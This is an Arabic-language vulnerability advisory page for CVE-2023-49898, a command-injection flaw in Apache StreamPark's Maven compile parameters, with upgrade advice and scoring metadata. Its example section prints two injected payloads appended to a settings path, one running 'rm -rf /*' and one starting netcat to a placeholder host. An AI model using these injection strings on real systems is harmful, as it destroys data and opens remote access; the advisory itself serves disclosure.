CVE-2023-49898 in StreamParkالمعلومات

الملخص

بحسب VulDB • 27/06/2026

في streampark، يوجد وحدة مشروع تدمج قدرة Maven على التجميع (Compilation). ومع ذلك، لا توجد تحقق من معاملات التجميع الخاصة بـ Maven، مما يسمح للمهاجمين بإدخال أوامر لتنفيذ الأوامر عن بُعد. الشرط المسبق لنجاح الهجوم هو أن يحتاج المستخدم إلى تسجيل الدخول إلى نظام streampark ولديه صلاحيات على مستوى النظام. بشكل عام، فقط مستخدمو ذلك النظام لديهم التفويض لتسجيل الدخول، ولن يقوم المستخدمين بإدخال أمر تشغيل خطير يدويًا. لذلك، فإن مستوى خطر هذا الثغرة منخفض جداً.

التخفيف:

يجب على جميع المستخدمين الترقية إلى الإصدار 2.1.2

مثال:

## يمكنك تخصيص طريقة الربط وفقاً لوضع تجميع المشروع، نتائج تجميع mvn تستخدم &&، فشل التجميع يستخدم "||" أو "&&":

/usr/share/java/maven-3/conf/settings.xml || rm -rf /*

/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

If you want to get best quality of vulnerability data, you may have to visit VulDB.

حجز

01/12/2023

إفشاء

15/12/2023

الاعتدال

تمت الموافقة

إدخال

VDB-248174

استغلال

تحميل

EPSS

0.02299

KEV

لا

النشاطات

منخفض جدًا

المصادر

Want to stay up to date on a daily basis?

Enable the mail alert feature now!